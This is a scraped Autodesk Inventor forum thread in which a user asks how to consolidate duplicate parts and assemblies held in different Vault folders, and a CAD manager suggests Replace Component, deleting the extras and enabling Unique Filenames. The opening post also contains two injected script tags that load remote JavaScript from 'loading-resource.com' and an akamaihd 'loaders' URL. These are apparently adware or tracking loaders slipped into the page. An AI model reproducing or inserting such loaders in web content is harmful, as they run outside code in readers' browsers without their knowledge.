Community
Inventor Forum
Welcome to Autodesk’s Inventor Forums. Share your knowledge, ask questions, and explore popular Inventor topics.
cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 

same part located in vault at different folder

2 REPLIES 2
Message 1 of 3
eric.yang
304 Views, 2 Replies

same part located in vault at different folder

Hi: I have some 3D parts and assemblies in Vault. they are same parts and same assembly. They are no any different. But, they are located in different folders in Vault. It means that the same part number located at different folder in Vault. How I can combine them in one location. I just want that there is 1 copy for 1 part number in vault.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
2 REPLIES 2
Message 2 of 3
BLHDrafting
in reply to: eric.yang

I'm not sure you can combine them, apart from picking the assy you want to keeop and using this in all of the parent assemblies. Then delete the other unwanted versions/locations of parts/assemblies.

To stop this function happening in the future you may want to turn on Unique Filenames.

Good luck.

Brendan Henderson
CAD Manager/Owner

BLH Drafting Services
Web www.blh.com.au
Twitter @BLHDrafting

Inventor 2012 PDS Premium SP 2 and Vault 2012 Update 1

Please mark as Accepted As Solution or give Kudos.
Message 3 of 3
BLHDrafting
in reply to: eric.yang

Or you can open the parent assy/s and do a Replace Component. As long as the target component has the same 'mate planes/surfaces/etc..' then this should work okay. After replacing all in each of the parent assy's then delete the unwanted/un-used versions from the folders.

Brendan Henderson
CAD Manager/Owner

BLH Drafting Services
Web www.blh.com.au
Twitter @BLHDrafting

Inventor 2012 PDS Premium SP 2 and Vault 2012 Update 1

Please mark as Accepted As Solution or give Kudos.

Can't find what you're looking for? Ask the community or share your knowledge.

Post to forums  

Autodesk Design & Make Report